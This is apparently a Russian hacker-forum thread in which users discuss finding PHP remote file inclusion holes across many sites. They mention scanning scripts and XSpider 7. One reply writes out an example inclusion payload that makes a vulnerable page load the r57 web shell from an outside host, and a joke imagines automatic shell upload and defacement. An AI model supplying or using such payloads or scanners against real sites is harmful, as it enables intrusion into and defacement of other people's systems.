сканнер уязвимостей в пхп инклуде

у когонить есть такой?

 

А теперь ещё раз по-русски и желательно конкретнее выражай свои мысли, а то нихера не понятно)

 

хз работаем ручками

 

+toxa+ он имеет ввиду сканер, который ищет php injection на сайте....

 

+toxa+
ну знаеш народ делает инклуды?
типа:
antichat.ru?page=http://rst.void.ru/download/r57shell.txt?

 

всё! взломали античат....

 

2 \6/
Use hands

 

(с) Мда...

 

Есть такое причем скриптов море

Допустим утилита jane-jane от cup.su - http://cup.su/releases/jane.txt

Или подобное от n4n0bit http://n4n0bit.nm.ru/c0d3/nJin4.pl.txt

 

нда... так ни 1 дельного ответа не получил....

 

Он имеет ввиду не сканер, а вбиваешь адрес сайта и он быстро сам заливает шелл, готовит кофе и дефэйсит от имени Усамы.

 

Да нету такого...

 

нет! я имею ввиду сканнер, чтоб не вручную каждый хост проверять, а вбил и он пишет - вот тут index.php?XEP=
есть уязвимость в инклуде.

 

Чем мой ответ не устраивает?

 

там скрипты.... а мне хотелось бы программу - скрипты - геморой.

 

А XSpider 7 разве не чекает подобным образом?

 

конечно чекает, он вообще все доступные параметры чекает на все, даже пост параметры... но ручками иногда лучше выходит, если например в гугле пробить сайт.

 

+1 спасибо)